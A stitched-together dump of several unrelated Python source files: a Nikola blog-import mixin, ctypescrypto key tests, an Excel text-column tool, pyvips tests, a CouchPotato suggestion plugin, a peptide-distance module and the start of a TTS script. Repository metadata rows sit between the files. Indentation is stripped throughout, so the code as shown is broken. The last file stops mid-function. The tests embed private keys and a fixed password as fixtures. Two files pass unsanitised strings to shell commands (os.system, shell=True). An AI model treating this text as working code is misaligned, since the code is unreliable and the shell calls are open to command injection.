# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""Mixin for importer plugins."""
import io
import csv
import datetime
import os
from pkg_resources import resource_filename
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse # NOQA
from lxml import etree, html
from mako.template import Template
from nikola import utils
links = {}
class ImportMixin(object):
"""Mixin with common used methods."""
name = "import_mixin"
needs_config = False
doc_usage = "[options] export_file"
doc_purpose = "import a dump from a different engine."
cmd_options = [
{
'name': 'output_folder',
'long': 'output-folder',
'short': 'o',
'default': 'new_site',
'help': 'Location to write imported content.'
},
]
def _execute(self, options={}, args=[]):
"""Import a blog from an export into a Nikola site."""
raise NotImplementedError("Must be implemented by a subclass.")
@classmethod
def get_channel_from_file(cls, filename):
"""Get channel from XML file."""
tree = etree.fromstring(cls.read_xml_file(filename))
channel = tree.find('channel')
return channel
@staticmethod
def configure_redirections(url_map, base_dir=''):
"""Configure redirections from an url_map."""
index = base_dir + 'index.html'
if index.startswith('/'):
index = index[1:]
redirections = []
for k, v in url_map.items():
if not k[-1] == '/':
k = k + '/'
# remove the initial "/" because src is a relative file path
src = (urlparse(k).path + 'index.html')[1:]
dst = (urlparse(v).path)
if src == index:
utils.LOGGER.warn("Can't do a redirect for: {0!r}".format(k))
else:
redirections.append((src, dst))
return redirections
def generate_base_site(self):
"""Generate a base Nikola site."""
if not os.path.exists(self.output_folder):
os.system('nikola init -q ' + self.output_folder)
else:
self.import_into_existing_site = True
utils.LOGGER.notice('The folder {0} already exists - assuming that this is a '
'already existing Nikola site.'.format(self.output_folder))
filename = resource_filename('nikola', 'conf.py.in')
# The 'strict_undefined=True' will give the missing symbol name if any,
# (ex: NameError: 'THEME' is not defined )
# for other errors from mako/runtime.py, you can add format_extensions=True ,
# then more info will be writen to *somefile* (most probably conf.py)
conf_template = Template(filename=filename, strict_undefined=True)
return conf_template
@staticmethod
def populate_context(channel):
"""Populate context with settings."""
raise NotImplementedError("Must be implemented by a subclass.")
@classmethod
def transform_content(cls, content):
"""Transform content to a Nikola-friendly format."""
return content
@classmethod
def write_content(cls, filename, content, rewrite_html=True):
"""Write content to file."""
if rewrite_html:
try:
doc = html.document_fromstring(content)
doc.rewrite_links(replacer)
content = html.tostring(doc, encoding='utf8')
except etree.ParserError:
content = content.encode('utf-8')
else:
content = content.encode('utf-8')
utils.makedirs(os.path.dirname(filename))
with open(filename, "wb+") as fd:
fd.write(content)
@classmethod
def write_post(cls, filename, content, headers, compiler, rewrite_html=True):
"""Ask the specified compiler to write the post to disk."""
if rewrite_html:
try:
doc = html.document_fromstring(content)
doc.rewrite_links(replacer)
content = html.tostring(doc, encoding='utf8')
except etree.ParserError:
pass
if isinstance(content, utils.bytes_str):
content = content.decode('utf-8')
compiler.create_post(
filename,
content=content,
onefile=True,
**headers)
def write_metadata(self, filename, title, slug, post_date, description, tags, **kwargs):
"""Write metadata to meta file."""
if not description:
description = ""
utils.makedirs(os.path.dirname(filename))
with io.open(filename, "w+", encoding="utf8") as fd:
data = {'title': title, 'slug': slug, 'date': post_date, 'tags': ','.join(tags), 'description': description}
data.update(kwargs)
fd.write(utils.write_metadata(data, site=self.site, comment_wrap=False))
@staticmethod
def write_urlmap_csv(output_file, url_map):
"""Write urlmap to csv file."""
utils.makedirs(os.path.dirname(output_file))
fmode = 'w+'
with io.open(output_file, fmode) as fd:
csv_writer = csv.writer(fd)
for item in url_map.items():
csv_writer.writerow(item)
def get_configuration_output_path(self):
"""Get path for the output configuration file."""
if not self.import_into_existing_site:
filename = 'conf.py'
else:
filename = 'conf.py.{name}-{time}'.format(
time=datetime.datetime.now().strftime('%Y%m%d_%H%M%S'),
name=self.name)
config_output_path = os.path.join(self.output_folder, filename)
utils.LOGGER.info('Configuration will be written to: {0}'.format(config_output_path))
return config_output_path
@staticmethod
def write_configuration(filename, rendered_template):
"""Write the configuration file."""
utils.makedirs(os.path.dirname(filename))
with io.open(filename, 'w+', encoding='utf8') as fd:
fd.write(rendered_template)
def replacer(dst):
"""Replace links."""
return links.get(dst, dst)
| mit | -6,260,775,873,164,549,000 | 35.157635 | 120 | 0.61485 | false |
vbwagner/ctypescrypto | tests/testpkey.py | 1 | 9134 | from ctypescrypto.pkey import PKey
from ctypescrypto import pyver
import unittest,re
from base64 import b64decode, b16decode
from subprocess import Popen,PIPE,CalledProcessError
def pem2der(s):
start=s.find('-----\n')
finish=s.rfind('\n-----END')
data=s[start+6:finish]
return b64decode(data)
def runopenssl(args,indata):
p=Popen(['openssl']+args,stdin=PIPE,stdout=PIPE,stderr=PIPE)
(out,err)=p.communicate(indata)
if p.returncode:
raise CalledProcessError(p.returncode," ".join(['openssl']+args)+":"+err)
if pyver > 2:
out = out.decode("utf-8")
return out
class TestPKey(unittest.TestCase):
rsa="""-----BEGIN PRIVATE KEY-----
MIICdQIBADANBgkqhkiG9w0BAQEFAASCAl8wggJbAgEAAoGBAL9CzVZu9bczTmB8
776pPUoPo6WbAfwQqqiGrj91bk2mYE+MNLo4yIQH45IcwGzkyS8+YyQJf8Bux5BC
oZ2nwzXm5+JZkxkN1mtMzit2D7/hHmrZLoSbr0sxXFrD4a35RI4hXnSK9Sk01sXA
Te2OgHzm5nk1sG97G6SFq7CHe3gvAgMBAAECgYAgGV8K7Y5xk7vIt88oyZCOuHc3
mP9JRabOp+PgpJ3BjHXHg/lpc5Q7jHNmF0s4O2GEe0z6RFnbevwlOvmS0xAQ1hpg
5TnVVkiZvcJeQaZqWIlEOaLqA12YdhSyorfB6p3tfQ7ZmQusg3SCsru5kPJV4sm0
I+MuRCQZWSzIqelloQJBAPbtScJI0lXx8sktntZi69cAVvLtz5z1T7bZwFakNkNE
SUCjNc/hEEI6/1LScV8Kx9kgQ0+W8smu+GyUDceyVFECQQDGSeS7cTmojkiPQxPB
zb0vS+Nfpq6oYsx+gn5TBgMeWIZZrtMEaUU2o+rwsjKBP/gy6D1zC2b4W5O/A/7a
1GR/AkBUQhYoKKc1UpExGtMXfrvRKrmAvatZeM/Rqi4aooAtpfCFEOw82iStJOqY
/VxYPRqCuaKeVvjT31O/4SlumihxAkBahRU0NKYbuoiJThfQ23lIBB7SZadKG4A7
KJs+j3oQ+lyqyFJwqxX7sazpIJBJzMgjhT24LTZenn++LbbEcz1FAkBmDmxoq7qO
Ao6uTm8fnkD4C836wS4mYAPqwRBK1JvnEXEQee9irf+ip89BAg74ViTcGF9lwJwQ
gOM+X5Db+3pK
-----END PRIVATE KEY-----
"""
rsaenc="""-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-256-CBC,7FF0E46291D60D35ACA881131C244655
BeJoui1lRQDvvPr+gH8xCdqkcgKCLWpZTvFZmvrqXmPqMHpm20nK0ESAd6kKm8d1
zaglRIHnnO6V7aDcwgOd3IYPEOnG2TIRQniZrwZdrXIfacscJ6Ekq+5YfLuyrRgq
fscGl7ntm/eGLqwrhzuv7jAXpn9QWiiAld0EWcmZCAW7nGaUQtu4rc4ULwL5SC/M
MOCPwpcD3SCQv55dX3cBOtfZ3lPbpgEpTpnNnj8OtxOkkIaG8yol7luwHvoOSyL/
WuXGCpfJE4LzbxnSLhbiN7q+y/Sro3cGc9aO4tXToMqTFel4zqR0YgOeFazlDRi1
mPuZcGLuSIef0kJn7Mg7jt0DQk579rTVxAhIu2rylTwEozkpCp5g4kGTJON++HQr
BRrApm4XlAoH2GX1jqDBoWSnXCRH49jNGQrLwy469i+994cG8uVU9Z5cqm/LDIR9
kwQfTJIvMi0g28NBMVgJ2gLj40OczxDGyNvBIbhPNswHljfsvPVr4vtxDGx8fS0N
lUJUOL9me+XNZ5xGHYuT5DOr7GE+H3hKEg+XfrYEete9BeI4gm9cqESvrLY9EU5Q
tOtnKKL7SglTZ5LxPMAedADC0o01nzr+D3gAiOhSgoZTrnQsSZ7iTJOtm3vNXwJx
AgesYmXtr5mdiBPKQ1QA/jF5LUZji+5KENd5WHNQw7tOlMLDrPFVRfLZg1AQDljx
u16kdyb71Kk3f6GCOfUntGr+kzppc3DDT+RcLetXphOOEQRy6C6/wmz08WlAPlu5
mFfSDijpWxoUHooQISg5mE82oR8V81aBpbLtm7KevwY=
-----END RSA PRIVATE KEY-----
"""
pkcs8crypt="""-----BEGIN ENCRYPTED PRIVATE KEY-----
MIICoTAbBgkqhkiG9w0BBQMwDgQIipVEnsV/gQoCAggABIICgE1i42C4aBhykhOi
EItFRE+9iBgiklGxoCJtukdp1UwDRKy/GJJ1rcS385CQy4Rs0zN8NH1faVRbf4Vt
iNACHtJx30qMCdo64CR+GJYHS4g2lGaz7PFNma8SjnAbGYXwXkdm5zhwmiU++wC7
W59u8oWS8Dj9dZBMzoOQGQT6xzZwQ14H65zHvC16HdKSNtRgXDWkBnD2cQzuOyuf
rFLyEf7/FH6B7/yKDcwsEfu97uPPxMvuusD1UubWnltO/Hc2oCPibN+dGw1PY9mC
18yGQtZkf5z30yhLosF62IVy3XY9Yf/TJYojIExoASrThGRvENzWkQ3qfnErqmng
l+dy66bmLjicobF5bO3xAhpU1dL+4/1ba2QuthVNlg6Or/iII1ntNN4PFyYcEwmX
e09C3dyOtV7qCq13S1bRkbZhzwi2QbLKALAzrZpF6VYmayTz8KjQOZ8BncAM+BiI
CtwuZJoXLW9kT4D7UsaSZdjUvzBIak5qdCGWpKmahMfjEEsCg6ApuIYmFrCgiY9c
0keYjY8DJ+4bEvqsQvTIaU9F9mFytI1E3LnR0NP1jHuOA7Jc+oNQ2adgFNj12jKQ
qNt1bEGNCqQHSrw7JNCrB7s+QAFNqJtno6fIq7vVNkqadJlnBbCIgm7NlJeGg9j6
a5YVNGlbs0J4dQF4Jw13302IBn3piSzthWL2gL98v/1lEwGuernEpPAjry3YhzM9
VA/oVt22n3yVA6dOSVL1oUTJyawEqASmH0jHAzXNDz+QLSLmz82ARcZPqPvVc45e
5h0xtqtFVkQLNbYzpNWGrx7R1hdr84nOKa8EsIxTRgEL/w9Y4Z/3xEoK2+KVBpMk
oxUuxuU=
-----END ENCRYPTED PRIVATE KEY-----
"""
password="1111"
rsakeytext="""Public-Key: (1024 bit)
Modulus:
00:bf:42:cd:56:6e:f5:b7:33:4e:60:7c:ef:be:a9:
3d:4a:0f:a3:a5:9b:01:fc:10:aa:a8:86:ae:3f:75:
6e:4d:a6:60:4f:8c:34:ba:38:c8:84:07:e3:92:1c:
c0:6c:e4:c9:2f:3e:63:24:09:7f:c0:6e:c7:90:42:
a1:9d:a7:c3:35:e6:e7:e2:59:93:19:0d:d6:6b:4c:
ce:2b:76:0f:bf:e1:1e:6a:d9:2e:84:9b:af:4b:31:
5c:5a:c3:e1:ad:f9:44:8e:21:5e:74:8a:f5:29:34:
d6:c5:c0:4d:ed:8e:80:7c:e6:e6:79:35:b0:6f:7b:
1b:a4:85:ab:b0:87:7b:78:2f
Exponent: 65537 (0x10001)
"""
ec1priv="""-----BEGIN PRIVATE KEY-----
MIGEAgEAMBAGByqGSM49AgEGBSuBBAAKBG0wawIBAQQgKnG6neqZvB98EEuuxnHs
fv+L/5abuNNG20wzUqRpncOhRANCAARWKXWeUZ6WiCKZ2kHx87jmJyx0G3ZB1iQC
+Gp2AJYswbQPhGPigKolzIbZYfwnn7QOca6N8QDhPAn3QQK8trZI
-----END PRIVATE KEY-----
"""
ec1keytext="""Public-Key: (256 bit)
pub:
04:56:29:75:9e:51:9e:96:88:22:99:da:41:f1:f3:
b8:e6:27:2c:74:1b:76:41:d6:24:02:f8:6a:76:00:
96:2c:c1:b4:0f:84:63:e2:80:aa:25:cc:86:d9:61:
fc:27:9f:b4:0e:71:ae:8d:f1:00:e1:3c:09:f7:41:
02:bc:b6:b6:48
ASN1 OID: secp256k1
"""
ec1pub="""-----BEGIN PUBLIC KEY-----
MFYwEAYHKoZIzj0CAQYFK4EEAAoDQgAEVil1nlGelogimdpB8fO45icsdBt2QdYk
AvhqdgCWLMG0D4Rj4oCqJcyG2WH8J5+0DnGujfEA4TwJ90ECvLa2SA==
-----END PUBLIC KEY-----
"""
def test_unencrypted_pem(self):
key=PKey(privkey=self.rsa)
self.assertTrue(key.cansign)
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_encrypted_pem(self):
key=PKey(privkey=self.rsaenc,password=self.password)
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_encrypted_pem_cb(self):
cb=lambda x:self.password
key=PKey(privkey=self.rsaenc,password=cb)
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_encryped_pem_pkcs8(self):
key=PKey(privkey=self.pkcs8crypt,password=self.password)
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_encrypted_der_pkcs8(self):
pkcs8der = pem2der(self.pkcs8crypt)
key=PKey(privkey=pkcs8der,password=self.password,format="DER")
self.assertIsNotNone(key.key)
self.assertEqual(str(key),self.rsakeytext)
def test_export_priv_pem(self):
key=PKey(privkey=self.ec1priv)
out=key.exportpriv()
self.assertEqual(self.ec1priv,out)
def test_export_priv_encrypt(self):
from ctypescrypto.cipher import CipherType
key=PKey(privkey=self.rsa)
pem=key.exportpriv(password='2222',cipher=CipherType("aes256"))
if pyver >2:
pem = pem.encode("ascii")
self.assertEqual(runopenssl(["pkey","-text_pub","-noout","-passin","pass:2222"],
pem),self.rsakeytext)
def test_export_priv_der(self):
key=PKey(privkey=self.rsa)
der=key.exportpriv(format="DER")
self.assertEqual(runopenssl(["pkey","-text_pub","-noout","-inform","DER"],
der),self.rsakeytext)
def test_export_priv_der_enc(self):
from ctypescrypto.cipher import CipherType
key=PKey(privkey=self.rsa)
der=key.exportpriv(format="DER",password='2222',cipher=CipherType("aes256"))
self.assertEqual(runopenssl(["pkcs8","-passin","pass:2222","-inform","DER"],
der),self.rsa)
def test_unencrypted_pem_ec(self):
key=PKey(privkey=self.ec1priv)
self.assertIsNotNone(key.key)
self.assertEqual(re.sub("pub: \n","pub:\n",str(key)),self.ec1keytext)
def test_unencrypted_der_ec(self):
key=PKey(privkey=pem2der(self.ec1priv),format="DER")
self.assertIsNotNone(key.key)
self.assertEqual(re.sub("pub: \n","pub:\n",str(key)),self.ec1keytext)
def test_pubkey_pem(self):
key=PKey(pubkey=self.ec1pub)
self.assertIsNotNone(key.key)
self.assertEqual(re.sub("pub: \n","pub:\n",str(key)),self.ec1keytext)
def test_pubkey_der(self):
key=PKey(pubkey=pem2der(self.ec1pub),format="DER")
self.assertIsNotNone(key.key)
self.assertEqual(re.sub("pub: \n","pub:\n",str(key)),self.ec1keytext)
def test_compare(self):
key1=PKey(privkey=self.ec1priv)
self.assertIsNotNone(key1.key)
key2=PKey(pubkey=self.ec1pub)
self.assertIsNotNone(key2.key)
self.assertEqual(key1,key2)
def test_sign(self):
signer=PKey(privkey=self.ec1priv)
digest=b16decode("FFCA2587CFD4846E4CB975B503C9EB940F94566AA394E8BD571458B9DA5097D5")
signature=signer.sign(digest)
self.assertTrue(len(signature)>0)
verifier=PKey(pubkey=self.ec1pub)
self.assertTrue(verifier.verify(digest,signature))
def test_generate(self):
newkey=PKey.generate("rsa")
self.assertIsNotNone(newkey.key)
s=str(newkey)
self.assertEqual(s[:s.find("\n")],"Public-Key: (1024 bit)")
def test_generate_params(self):
newkey=PKey.generate("rsa",rsa_keygen_bits=2048)
self.assertIsNotNone(newkey.key)
s=str(newkey)
self.assertEqual(s[:s.find("\n")],"Public-Key: (2048 bit)")
def test_generate_ec(self):
templkey=PKey(pubkey=self.ec1pub)
newkey=PKey.generate("ec",paramsfrom=templkey)
self.assertIsNotNone(newkey.key)
s=str(newkey)
self.assertEqual(s[:s.find("\n")],"Public-Key: (256 bit)")
self.assertNotEqual(str(templkey),str(newkey))
if __name__ == "__main__":
unittest.main()
| mit | -7,343,754,033,386,160,000 | 43.125604 | 92 | 0.737464 | false |
x522758754/XlsTools | xlsDelCol.py | 1 | 3807 | #!/user/bin/env python
# coding:utf-8
import sys
import os
import codecs
import pandas as pd
reload(sys)
sys.setdefaultencoding('utf-8')
#删除的列 从0开始
DELCOL = 1
_DictFileCoding = dict()
def GetAllTxt(srcPath, dstPath):
#print path
srcfiles = []
dstfiles = []
for root, dirs, files in os.walk(srcPath):
for f in files:
if f.endswith('.txt'):
srcfile = os.path.join(root, f)
srcfiles.append(srcfile)
#filePath = filePath.replace('\\','/')
dstfile = srcfile.replace(srcPath, dstPath, 1)
dstfiles.append(dstfile)
return srcfiles, dstfiles
def handleEncoding2Utf(original_file,newfile):
#newfile=original_file[0:original_file.rfind(.)]+'_copy.csv'
f=open(original_file,'rb+')
content=f.read()#读取文件内容,content为bytes类型,而非string类型
source_encoding='utf-8'
#####确定encoding类型
try:
content.decode('utf-8').encode('utf-8')
source_encoding='utf-8'
except:
try:
content.decode('gbk').encode('utf-8')
source_encoding='gbk'
except:
try:
content.decode('gb2312').encode('utf-8')
source_encoding='gb2312'
except:
try:
content.decode('gb18030').encode('utf-8')
source_encoding='gb18030'
except:
try:
content.decode('big5').encode('utf-8')
source_encoding='gb18030'
except:
content.decode('cp936').encode('utf-8')
source_encoding='cp936'
f.close()
#####按照确定的encoding读取文件内容,并另存为utf-8编码:
block_size=4096
#print(original_file, source_encoding)
dstDir = os.path.dirname(newfile)
if not os.path.exists(dstDir):
os.makedirs(dstDir)
with codecs.open(original_file,'r',source_encoding) as f:
with codecs.open(newfile,'w','utf-8') as f2:
while True:
content=f.read(block_size)
if not content:
break
f2.write(content)
_DictFileCoding[newfile] = source_encoding
def handleEncodingUtf2(original_file, newfile, coding = 'gbk'):
block_size=4096
source_encoding = 'utf-8'
#print(original_file, source_encoding)
dstDir = os.path.dirname(newfile)
if not os.path.exists(dstDir):
os.makedirs(dstDir)
with codecs.open(original_file,'r',source_encoding) as f:
with codecs.open(newfile,'w', coding) as f2:
while True:
content=f.read(block_size)
if not content:
break
f2.write(content)
def DelRowFile(srcPath, dstPath):
dir = os.path.dirname(dstPath)
if not os.path.exists(dir):
os.makedirs(dir)
with open(srcPath) as fp_in:
with open(dstPath, 'w') as fp_out:
#fp_out.writelines(line for i, line in enumerate(fp_in) if i != DELROW)
for line in fp_in.readlines():
print line
fp_out.write(line)
def DelColFile(srcPath):
#df = pd.read_csv(srcPath, encoding='utf-8')
df = pd.read_csv(srcPath,sep='\t',header=None, encoding='utf-8',)
df.drop([df.columns[DELCOL]], axis=1, inplace=True)
df.to_csv(srcPath, sep='\t',header=None, encoding='utf-8',index=None)
def main(argv):
#temp='TaskConfig'
#handleEncoding2Utf('Data/public/' + temp +'.txt', 'Dat/' + temp +'.txt')
#DelColFile('Dat/' + temp +'.txt')
#handleEncodingUtf2('Dat/' + temp +'.txt', 'Da/' + temp +'.txt')
#return
src = ""
dst = ""
if(len(argv) != 3):
#return
src = 'Data'
dst = 'Datas'
else:
src = argv[1]
dst = argv[2]
if not os.path.exists(src):
print u'Error! ----------------原始目录:%s 不存在' %(src)
return
print u'----------------原始目录 %s---------------' %(src)
print u'----------------目标目录 %s---------------' %(dst)
srcfiles, dstfiles = GetAllTxt(src, dst)
fLen = len(srcfiles)
for i in range(fLen):
src_file = srcfiles[i]
dst_file = dstfiles[i]
handleEncoding2Utf(src_file, dst_file)
DelColFile(dst_file)
handleEncodingUtf2(dst_file, src_file,_DictFileCoding[dst_file])
if('__main__' == __name__):
main(sys.argv)
| mit | 5,793,836,253,580,370,000 | 25.134752 | 74 | 0.652917 | false |
kleisauke/pyvips | pyvips/tests/test_gvalue.py | 1 | 3235 | # vim: set fileencoding=utf-8 :
import unittest
import pyvips
from .helpers import PyvipsTester, JPEG_FILE
class TestGValue(PyvipsTester):
def test_bool(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.gbool_type)
gv.set(True)
value = gv.get()
self.assertEqual(value, True)
gv.set(False)
value = gv.get()
self.assertEqual(value, False)
def test_int(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.gint_type)
gv.set(12)
value = gv.get()
self.assertEqual(value, 12)
def test_double(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.gdouble_type)
gv.set(3.1415)
value = gv.get()
self.assertEqual(value, 3.1415)
def test_enum(self):
# the Interpretation enum is created when the first image is made --
# make it ourselves in case we are run before the first image
pyvips.vips_lib.vips_interpretation_get_type()
interpretation_gtype = pyvips.gobject_lib. \
g_type_from_name(b'VipsInterpretation')
gv = pyvips.GValue()
gv.set_type(interpretation_gtype)
gv.set('xyz')
value = gv.get()
self.assertEqual(value, 'xyz')
def test_flags(self):
# the OperationFlags enum is created when the first op is made --
# make it ourselves in case we are run before that
pyvips.vips_lib.vips_operation_flags_get_type()
operationflags_gtype = pyvips.gobject_lib. \
g_type_from_name(b'VipsOperationFlags')
gv = pyvips.GValue()
gv.set_type(operationflags_gtype)
gv.set(12)
value = gv.get()
self.assertEqual(value, 12)
def test_string(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.gstr_type)
gv.set('banana')
value = gv.get()
self.assertEqual(value, 'banana')
def test_array_int(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.array_int_type)
gv.set([1, 2, 3])
value = gv.get()
self.assertAlmostEqualObjects(value, [1, 2, 3])
def test_array_double(self):
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.array_double_type)
gv.set([1.1, 2.1, 3.1])
value = gv.get()
self.assertAlmostEqualObjects(value, [1.1, 2.1, 3.1])
def test_image(self):
image = pyvips.Image.new_from_file(JPEG_FILE)
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.image_type)
gv.set(image)
value = gv.get()
self.assertEqual(value, image)
def test_array_image(self):
image = pyvips.Image.new_from_file(JPEG_FILE)
r, g, b = image.bandsplit()
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.array_image_type)
gv.set([r, g, b])
value = gv.get()
self.assertEqual(value, [r, g, b])
def test_blob(self):
with open(JPEG_FILE, 'rb') as f:
blob = f.read()
gv = pyvips.GValue()
gv.set_type(pyvips.GValue.blob_type)
gv.set(blob)
value = gv.get()
self.assertEqual(value, blob)
if __name__ == '__main__':
unittest.main()
| mit | 4,357,290,625,036,344,300 | 29.233645 | 76 | 0.57898 | false |
TNosredna/CouchPotatoServer | couchpotato/core/plugins/suggestion/main.py | 1 | 3422 | from couchpotato import get_session
from couchpotato.api import addApiView
from couchpotato.core.event import fireEvent
from couchpotato.core.helpers.encoding import ss
from couchpotato.core.helpers.variable import splitString, md5
from couchpotato.core.plugins.base import Plugin
from couchpotato.core.settings.model import Movie
from couchpotato.environment import Env
from sqlalchemy.sql.expression import or_
class Suggestion(Plugin):
def __init__(self):
addApiView('suggestion.view', self.suggestView)
addApiView('suggestion.ignore', self.ignoreView)
def suggestView(self, **kwargs):
movies = splitString(kwargs.get('movies', ''))
ignored = splitString(kwargs.get('ignored', ''))
limit = kwargs.get('limit', 6)
if not movies or len(movies) == 0:
db = get_session()
active_movies = db.query(Movie) \
.filter(or_(*[Movie.status.has(identifier = s) for s in ['active', 'done']])).all()
movies = [x.library.identifier for x in active_movies]
if not ignored or len(ignored) == 0:
ignored = splitString(Env.prop('suggest_ignore', default = ''))
cached_suggestion = self.getCache('suggestion_cached')
if cached_suggestion:
suggestions = cached_suggestion
else:
suggestions = fireEvent('movie.suggest', movies = movies, ignore = ignored, single = True)
self.setCache(md5(ss('suggestion_cached')), suggestions, timeout = 6048000) # Cache for 10 weeks
return {
'success': True,
'count': len(suggestions),
'suggestions': suggestions[:limit]
}
def ignoreView(self, imdb = None, limit = 6, remove_only = False, **kwargs):
ignored = splitString(Env.prop('suggest_ignore', default = ''))
if imdb:
if not remove_only:
ignored.append(imdb)
Env.prop('suggest_ignore', ','.join(set(ignored)))
new_suggestions = self.updateSuggestionCache(ignore_imdb = imdb, limit = limit, ignored = ignored)
return {
'result': True,
'ignore_count': len(ignored),
'suggestions': new_suggestions[limit - 1:limit]
}
def updateSuggestionCache(self, ignore_imdb = None, limit = 6, ignored = None):
# Combine with previous suggestion_cache
cached_suggestion = self.getCache('suggestion_cached')
new_suggestions = []
ignored = [] if not ignored else ignored
if ignore_imdb:
for cs in cached_suggestion:
if cs.get('imdb') != ignore_imdb:
new_suggestions.append(cs)
# Get new results and add them
if len(new_suggestions) - 1 < limit:
db = get_session()
active_movies = db.query(Movie) \
.filter(or_(*[Movie.status.has(identifier = s) for s in ['active', 'done']])).all()
movies = [x.library.identifier for x in active_movies]
ignored.extend([x.get('imdb') for x in cached_suggestion])
suggestions = fireEvent('movie.suggest', movies = movies, ignore = list(set(ignored)), single = True)
if suggestions:
new_suggestions.extend(suggestions)
self.setCache(md5(ss('suggestion_cached')), new_suggestions, timeout = 6048000)
return new_suggestions
| gpl-3.0 | 2,790,638,608,713,622,000 | 36.604396 | 113 | 0.611631 | false |
FRED-2/Fred2-Apps | src/Distance2SelfBinding.py | 2 | 3775 | # This code is part of the Fred2 distribution and governed by its
# license. Please see the LICENSE file that should have been included
# as part of this package.
from tempfile import NamedTemporaryFile
__author__ = 'mohr,schubert'
import os
import subprocess
import logging
import itertools
import pandas
from Fred2.Core import Allele, AExternal
import DistanceMatrices
from DistanceMatrix import DistanceMatrix
class Distance2Self(object):
"""
Implements calulcation routine of distance to (self) peptides
Calculate k closest distances of peptide to peptide set represented as trie
All our matrices have the same ordering of letters.
If you use a new matrix, pleas make sure to use the same ordering! Otherwise the tries have to be recomputed!
"""
def __init__(self, _matrix, trie=None, saveTrieFile=False):
self.__saveTrieFile = saveTrieFile
self.__matrix = _matrix
self.__trie = trie
this_dir = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
self.__externalPathDistanceCalculator = os.path.join(this_dir, 'compute_distances_ivac')
self.__externalPathTrieGenerator = os.path.join(this_dir, 'get_TrieArray')
def __del__(self):
if not self.__saveTrieFile:
pass
def generate_trie(self, fastaFile, outfile='peptideTrie', peptideLength=9):
cmd = self.__externalPathTrieGenerator + " %s %s %s %s"
specifiedTrie = outfile
self.__trie = specifiedTrie
subprocess.check_output(cmd%(fastaFile, self.__matrix.path_to_matrix_file, peptideLength, specifiedTrie), shell=True)
def calculate_distances(self, peptides, pep_header="neopeptide", specifiedTrie="uniprot_proteome_l9", n=10):
def __load_trie(trieSource):
current = os.path.realpath(os.path.join(os.getcwd(), os.path.dirname(__file__)))
return os.path.join(current,"data","tries","{}.trie".format(trieSource))
# create temporary file with peptides for distance computation
tmpFile = NamedTemporaryFile(delete=False)
with open(tmpFile.name, "w") as peptidesFile:
for pep in peptides:
peptidesFile.write('%s\n' % pep)
cmd = self.__externalPathDistanceCalculator + " %s %s %s %s"
results = {}
trie = specifiedTrie if os.path.isfile(specifiedTrie) else __load_trie(specifiedTrie)
method = os.path.basename(specifiedTrie).split('.')[0] if os.path.isfile(specifiedTrie) else specifiedTrie
try:
re = self.parse_external_result(
subprocess.check_output(cmd % (self.__matrix.path_to_matrix_file, trie, tmpFile.name, n),shell=True))
for k, vs in re.iteritems():
results.setdefault(pep_header, []).append(k)
results.setdefault("trie", []).append(method)
for i,v in enumerate(vs):
if i > 0:
results.setdefault("distance_{i}".format(i=i),[]).append(float(v))
else:
results.setdefault("distance", []).append(float(v))
except:
logging.warning("Could not make distance calculation for trie {}".format(trie))
os.remove(tmpFile.name)
return pandas.DataFrame.from_dict(results)
def parse_external_result(self, result):
"""
:rtype : DataFrame
"""
parsedResult = {}
for line in result.strip().split('\n'):
splitted = line.strip().split(" ")[-1].split(";")
distanceValues = []
peptide = splitted[0].split(":")[0]
for s in splitted[:-1]:
distanceValues.append(float(s.split(",")[-1])/float(len(peptide)))
parsedResult[peptide] = distanceValues
return parsedResult
| bsd-3-clause | 6,947,356,897,559,048,000 | 36.009804 | 125 | 0.63894 | false |
xe1gyq/nuupxe | core/GoogleTTS.py | 1 | 5682 | #!/usr/bin/python
import commands
import sys
import argparse
import re
import urllib, urllib2
import time
from collections import namedtuple
def split_text(input_text, max_length=100):
"""
Try to split between sentences to avoid interruptions mid-sentence.
Failing that, split between words.
See split_text_rec
"""
def split_text_rec(input_text, regexps, max_length=max_length):
"""
Split a string into substrings which are at most max_length.
Tries to make each substring as big as possible without exceeding
max_length.
Will use the first regexp in regexps to split the input into
substrings.
If it it impossible to make all the segments less or equal than
max_length with a regexp then the next regexp in regexps will be used
to split those into subsegments.
If there are still substrings who are too big after all regexps have
been used then the substrings, those will be split at max_length.
Args:
input_text: The text to split.
regexps: A list of regexps.
If you want the separator to be included in the substrings you
can add parenthesis around the regular expression to create a
group. Eg.: '[ab]' -> '([ab])'
Returns:
a list of strings of maximum max_length length.
"""
if(len(input_text) <= max_length): return [input_text]
#mistakenly passed a string instead of a list
if isinstance(regexps, basestring): regexps = [regexps]
regexp = regexps.pop(0) if regexps else '(.{%d})' % max_length
text_list = re.split(regexp, input_text)
combined_text = []
#first segment could be >max_length
combined_text.extend(split_text_rec(text_list.pop(0), regexps, max_length))
for val in text_list:
current = combined_text.pop()
concat = current + val
if(len(concat) <= max_length):
combined_text.append(concat)
else:
combined_text.append(current)
